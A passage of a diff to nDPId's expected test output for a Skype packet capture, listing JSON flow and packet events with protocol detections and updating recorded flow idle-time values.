+00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":791,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":1,"flow_last_seen":1431970659480,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970659480,"pkt":"0NQSxnP1PBXCt3IOCABFAABAaDxAAEAGUyXAqAEib91Nr8gyAbuh2H3fAAAAALAC\/\/+ohwAAAgQFtAEDAwUBAQgKPjHnRwAAAAAEAgAA"} 
+00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":792,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659834,"flow_last_seen":1431970659834,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970659834,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":51251,"dst_port":40029,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":792,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":1,"flow_last_seen":1431970659834,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970659834,"pkt":"0NQSxnP1PBXCt3IOCABFAABAPbBAAEAG45PAqAEiQAQXpsgznF2bjnkgAAAAALAC\/\/99bQAAAgQFtAEDAwUBAQgKPjHoqQAAAAAEAgAA"} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":793,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659834,"flow_last_seen":1431970659834,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970659834,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.144","src_port":13021,"dst_port":40016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":793,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":1,"flow_last_seen":1431970659834,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431970659834,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1elAAAEARHtbAqAEinTeCkDLdnFAAIfN1e0UCt0zo\/WrZ+Zw8Ki6+SR8vgG1TLjatCw=="} 00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":793,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659834,"flow_last_seen":1431970659834,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970659834,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.144","src_port":13021,"dst_port":40016,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
@@ -439,24 +439,24 @@ 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":797,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659835,"flow_last_seen":1431970659835,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970659835,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":797,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":126,"flow_packet_id":1,"flow_last_seen":1431970659835,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1431970659835,"pkt":"0NQSxnP1PBXCt3IOCABFAAA71A4AAEARxQ\/AqAEinTeCkjLdnGEAJ5FDe00CRUi6WS8h8mPi8e9oMy1XIZqCitDbn3NkpyCi9w=="} 00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":797,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659835,"flow_last_seen":1431970659835,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970659835,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":40033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
-00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":798,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":2,"flow_last_seen":1431970659837,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970659837,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGxWVv3U2vwKgBIgG7yDJl2k5Wodh94KASOJCbeAAAAgQFrAQCCApNo+OiPjHnRwEDAwk="} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":799,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":3,"flow_last_seen":1431970659837,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970659837,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0vZ1AAEAG\/c\/AqAEib91Nr8gyAbuh2H3gZdpOV4AQECzxPQAAAQEICj4x6KxNo+Oi"} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":801,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":2,"flow_last_seen":1431970660037,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970660037,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGK0hABBemwKgBIpxdyDOxwWA5m455IaASOJAGLQAAAgQFrAQCCApMQvFqPjHoqQEDAwk="} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":802,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":3,"flow_last_seen":1431970660037,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970660037,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0G21AAEAGBePAqAEiQAQXpsgznF2bjnkhscFgOoAQECxcjQAAAQEICj4x6XNMQvFq"} 
-00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":808,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970660159,"flow_last_seen":1431970660159,"flow_idle_time":7440000,"flow_min_l4_payload_len":277,"flow_max_l4_payload_len":277,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":277,"midstream":1,"thread_ts_msec":1431970660159,"l3_proto":"ip4","src_ip":"108.160.163.108","dst_ip":"192.168.1.34","src_port":443,"dst_port":51222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00857{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":808,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":127,"flow_packet_id":1,"flow_last_seen":1431970660159,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":343,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":343,"pkt_l4_len":309,"thread_ts_msec":1431970660159,"pkt":"PBXCt3IO0NQSxnP1CABFAAFJkcJAADIG5BVsoKNswKgBIgG7yBaV3SxsiZUqrIAYACaXjgAAAQEICmGAz38+MVp4FwMBARB8Fy4qyreLjg5Q96tDDF\/tJNQpsIShBClYLxny\/F4IVS87inYaH8NMzidehO4QJLb0Gpm5qZy83nu17ekToUXtOsjvJgerL5AdcFL4wkOs5YWIZJQILj89EVd3kwm2gSreMO6fU0x3sDxMFrXZesIKTvERW3z9QiBmYf77CRAcaBKDIZ4h8M6jvsMWFjh8rbcU6C9Yz3364yiyHbQuoqtvQN4EQD7H\/ZMlnDFOtnG2H8aPUdqUMD5HAjMSCpEQqc4JKy0wVFFuLxpIEra0u2hVB7ftMdJLJ\/sq+RNwy1Sfuv0g7qCHweCB0CkHYTzB2\/cU6qQOlFTex1tRE+sh29iBulHeN2MmenT9xvrZggKZYQ=="} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":809,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":127,"flow_packet_id":2,"flow_last_seen":1431970660159,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970660159,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0\/qVAAEAGakfAqAEibKCjbMgWAbuJlSqsld0tgYAQD\/f6XgAAAQEICj4x6exhgM9\/"} 
-01771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":810,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":127,"flow_packet_id":3,"flow_last_seen":1431970660162,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1020,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1020,"pkt_l4_len":986,"thread_ts_msec":1431970660162,"pkt":"0NQSxnP1PBXCt3IOCABFAAPuXRVAAEAGCB7AqAEibKCjbMgWAbuJlSqsld0tgYAYEABN6wAAAQEICj4x6e5hgM9\/FwMBACBZ+Bs2C0RS\/3DQyGZlP7ulpgg75GP5qHQjRGtchozZwxcDAQOQsZo+mdYHDHNhryD2tBwTy4NvJ6ZcB90CLvDuO3oQpA0NMcbrVNY5NoFZnnz0+pHYPlsxDiwS7sQ7DD24qzDLtHgUUDp9pF8b6+msIHWzLPEMF8+q7Hjw2nVwpow1oTrrramWFNK3HRWRwVplTmpzcS1pGJ+gQZaUVDp8kdn+ynK0M3\/CdKLtFbx\/CK0N6q8IWYmbmyMU5F09Bl18WwyIuujJA\/tFE5EWnSsW2X+zhBTRq9ZI\/U83NB7qUlABm1QnhF8bT1juNjzO0mWZlZFkQTsnKvttlKSdtcMJ5dRpAqaA7SHB9Yz5a49nYhRO+wwnisVOiZGDLnrE+5oMmTb9C9ZKB5wr20bAzzEkorS06bd9G1Av+Y\/0Lf00cKMeFW4\/NlQQW2HF8cVYvIZB6\/NQlnUH0R\/vBxkZqKxj1qnAgjVDBnssNNPdbIKrHQdoBZOJ1oafA1nh+V4oZbi2LQd\/E9fD9yqlUtsVwzp7nZEacc3p6m0hUW7kAV1Xt3xzsImKJZZ7j62VNDmcm6WWPL29PEP1oF9dSb1pTuKLUUHMDB7w2YxBjm\/ZP6TnMxz3NjZHO6QfscWBsVMMmj8RnOruQ3QLIGDLGpDyMgBlDBTqoOiUC8PgBmSlGAPlhRVT95WOL1mqA6t0DBes+DH8fSZeIVvA3K7YCF4kypftCQiLFXrErN2XOvSvejhBSuUJcdOOdCNOjGoPoLOWoqVEN7LXgsXaWfdoBTx79TQIPG1as39Z7fRVj+fkKyD61xYiyqgtf1\/WpWVrCyTwKovWQ0C6GFD907jbLAxlD1UmA3abuFNLCt\/acdLUjndrKvuooQD6IYCIwrJi8YL7kKb0+32ovATeOhPAdbLgWa9wSUgKddlog7emY+Y\/Esr+n4M8E4bdevnoTb75M4ozaSVREGSwce5U3XhhEIMmQQkznZpj46Kf9jFwDbzxK7wZgQZ21paket5\/tiCE9zIgnjVS0wcx5TiuHX4egIJeH+3peLDINK2jmmDw6Tm7kJ69c9scP9Gd7zhw6XHG1S0IW6aTMTHKdqb5u2V1sEk8osIRYPNxQKLPY35nEHSqNlCZVyRPLhgWH+JjqVOEwNbhNBOOCigDYop+TfjfQDQrLH+IrQWISQBJnU69BfsNuFeEx3PLuH6o+oBZH+QNZRQR6lheial\/vXPOSCwP4oQlK11s+sl5+hhICPKCRXfAUncH7wDdsLSe"} 
+00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":798,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":2,"flow_last_seen":1431970659837,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970659837,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGxWVv3U2vwKgBIgG7yDJl2k5Wodh94KASOJCbeAAAAgQFrAQCCApNo+OiPjHnRwEDAwk="} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":799,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":3,"flow_last_seen":1431970659837,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970659837,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0vZ1AAEAG\/c\/AqAEib91Nr8gyAbuh2H3gZdpOV4AQECzxPQAAAQEICj4x6KxNo+Oi"} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":801,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":2,"flow_last_seen":1431970660037,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970660037,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGK0hABBemwKgBIpxdyDOxwWA5m455IaASOJAGLQAAAgQFrAQCCApMQvFqPjHoqQEDAwk="} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":802,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":3,"flow_last_seen":1431970660037,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970660037,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0G21AAEAGBePAqAEiQAQXpsgznF2bjnkhscFgOoAQECxcjQAAAQEICj4x6XNMQvFq"} 
+00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":808,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970660159,"flow_last_seen":1431970660159,"flow_idle_time":7560000,"flow_min_l4_payload_len":277,"flow_max_l4_payload_len":277,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":277,"midstream":1,"thread_ts_msec":1431970660159,"l3_proto":"ip4","src_ip":"108.160.163.108","dst_ip":"192.168.1.34","src_port":443,"dst_port":51222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00857{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":808,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":127,"flow_packet_id":1,"flow_last_seen":1431970660159,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":343,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":343,"pkt_l4_len":309,"thread_ts_msec":1431970660159,"pkt":"PBXCt3IO0NQSxnP1CABFAAFJkcJAADIG5BVsoKNswKgBIgG7yBaV3SxsiZUqrIAYACaXjgAAAQEICmGAz38+MVp4FwMBARB8Fy4qyreLjg5Q96tDDF\/tJNQpsIShBClYLxny\/F4IVS87inYaH8NMzidehO4QJLb0Gpm5qZy83nu17ekToUXtOsjvJgerL5AdcFL4wkOs5YWIZJQILj89EVd3kwm2gSreMO6fU0x3sDxMFrXZesIKTvERW3z9QiBmYf77CRAcaBKDIZ4h8M6jvsMWFjh8rbcU6C9Yz3364yiyHbQuoqtvQN4EQD7H\/ZMlnDFOtnG2H8aPUdqUMD5HAjMSCpEQqc4JKy0wVFFuLxpIEra0u2hVB7ftMdJLJ\/sq+RNwy1Sfuv0g7qCHweCB0CkHYTzB2\/cU6qQOlFTex1tRE+sh29iBulHeN2MmenT9xvrZggKZYQ=="} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":809,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":127,"flow_packet_id":2,"flow_last_seen":1431970660159,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970660159,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0\/qVAAEAGakfAqAEibKCjbMgWAbuJlSqsld0tgYAQD\/f6XgAAAQEICj4x6exhgM9\/"} 
+01771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":810,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":127,"flow_packet_id":3,"flow_last_seen":1431970660162,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1020,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1020,"pkt_l4_len":986,"thread_ts_msec":1431970660162,"pkt":"0NQSxnP1PBXCt3IOCABFAAPuXRVAAEAGCB7AqAEibKCjbMgWAbuJlSqsld0tgYAYEABN6wAAAQEICj4x6e5hgM9\/FwMBACBZ+Bs2C0RS\/3DQyGZlP7ulpgg75GP5qHQjRGtchozZwxcDAQOQsZo+mdYHDHNhryD2tBwTy4NvJ6ZcB90CLvDuO3oQpA0NMcbrVNY5NoFZnnz0+pHYPlsxDiwS7sQ7DD24qzDLtHgUUDp9pF8b6+msIHWzLPEMF8+q7Hjw2nVwpow1oTrrramWFNK3HRWRwVplTmpzcS1pGJ+gQZaUVDp8kdn+ynK0M3\/CdKLtFbx\/CK0N6q8IWYmbmyMU5F09Bl18WwyIuujJA\/tFE5EWnSsW2X+zhBTRq9ZI\/U83NB7qUlABm1QnhF8bT1juNjzO0mWZlZFkQTsnKvttlKSdtcMJ5dRpAqaA7SHB9Yz5a49nYhRO+wwnisVOiZGDLnrE+5oMmTb9C9ZKB5wr20bAzzEkorS06bd9G1Av+Y\/0Lf00cKMeFW4\/NlQQW2HF8cVYvIZB6\/NQlnUH0R\/vBxkZqKxj1qnAgjVDBnssNNPdbIKrHQdoBZOJ1oafA1nh+V4oZbi2LQd\/E9fD9yqlUtsVwzp7nZEacc3p6m0hUW7kAV1Xt3xzsImKJZZ7j62VNDmcm6WWPL29PEP1oF9dSb1pTuKLUUHMDB7w2YxBjm\/ZP6TnMxz3NjZHO6QfscWBsVMMmj8RnOruQ3QLIGDLGpDyMgBlDBTqoOiUC8PgBmSlGAPlhRVT95WOL1mqA6t0DBes+DH8fSZeIVvA3K7YCF4kypftCQiLFXrErN2XOvSvejhBSuUJcdOOdCNOjGoPoLOWoqVEN7LXgsXaWfdoBTx79TQIPG1as39Z7fRVj+fkKyD61xYiyqgtf1\/WpWVrCyTwKovWQ0C6GFD907jbLAxlD1UmA3abuFNLCt\/acdLUjndrKvuooQD6IYCIwrJi8YL7kKb0+32ovATeOhPAdbLgWa9wSUgKddlog7emY+Y\/Esr+n4M8E4bdevnoTb75M4ozaSVREGSwce5U3XhhEIMmQQkznZpj46Kf9jFwDbzxK7wZgQZ21paket5\/tiCE9zIgnjVS0wcx5TiuHX4egIJeH+3peLDINK2jmmDw6Tm7kJ69c9scP9Gd7zhw6XHG1S0IW6aTMTHKdqb5u2V1sEk8osIRYPNxQKLPY35nEHSqNlCZVyRPLhgWH+JjqVOEwNbhNBOOCigDYop+TfjfQDQrLH+IrQWISQBJnU69BfsNuFeEx3PLuH6o+oBZH+QNZRQR6lheial\/vXPOSCwP4oQlK11s+sl5+hhICPKCRXfAUncH7wDdsLSe"} 
00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":819,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970660848,"flow_last_seen":1431970660848,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970660848,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.24","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":819,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":128,"flow_packet_id":1,"flow_last_seen":1431970660848,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431970660848,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6TMEAAEARsjLAqAEib91KGDLdnGAAJk69e08C7Jn\/msaru979SjBYNnh0LMk7Ko\/+l6KrptIV"} 00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":819,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970660848,"flow_last_seen":1431970660848,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970660848,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.24","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":820,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970660848,"flow_last_seen":1431970660848,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970660848,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.160","src_port":13021,"dst_port":40016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":820,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":129,"flow_packet_id":1,"flow_last_seen":1431970660848,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431970660848,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4j48AAEARa97AqAEib91NoDLdnFAAJOlwe1ECSObCw6nUMfh7bnqIU3mueprtSIlR2AyZTQ=="} 00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":820,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970660848,"flow_last_seen":1431970660848,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970660848,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.160","src_port":13021,"dst_port":40016,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":831,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970661447,"flow_last_seen":1431970661447,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970661447,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":51253,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":831,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":1,"flow_last_seen":1431970661447,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970661447,"pkt":"0NQSxnP1PBXCt3IOCABFAABAYfhAAEAGv0vAqAEiQAQXpsg1Abs0yMrkAAAAALAC\/\/8mywAAAgQFtAEDAwUBAQgKPjHu7gAAAAAEAgAA"} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":833,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":2,"flow_last_seen":1431970661649,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970661649,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGK0hABBemwKgBIgG7yDUuR6JLNMjK5aASOJDvYAAAAgQFrAQCCApMQvL8PjHu7gEDAwk="} 
-00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":834,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":3,"flow_last_seen":1431970661649,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970661649,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0asRAAEAGtovAqAEiQAQXpsg1Abs0yMrlLkeiTIAQECxFxAAAAQEICj4x77VMQvL8"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":831,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970661447,"flow_last_seen":1431970661447,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970661447,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":51253,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":831,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":1,"flow_last_seen":1431970661447,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970661447,"pkt":"0NQSxnP1PBXCt3IOCABFAABAYfhAAEAGv0vAqAEiQAQXpsg1Abs0yMrkAAAAALAC\/\/8mywAAAgQFtAEDAwUBAQgKPjHu7gAAAAAEAgAA"} 
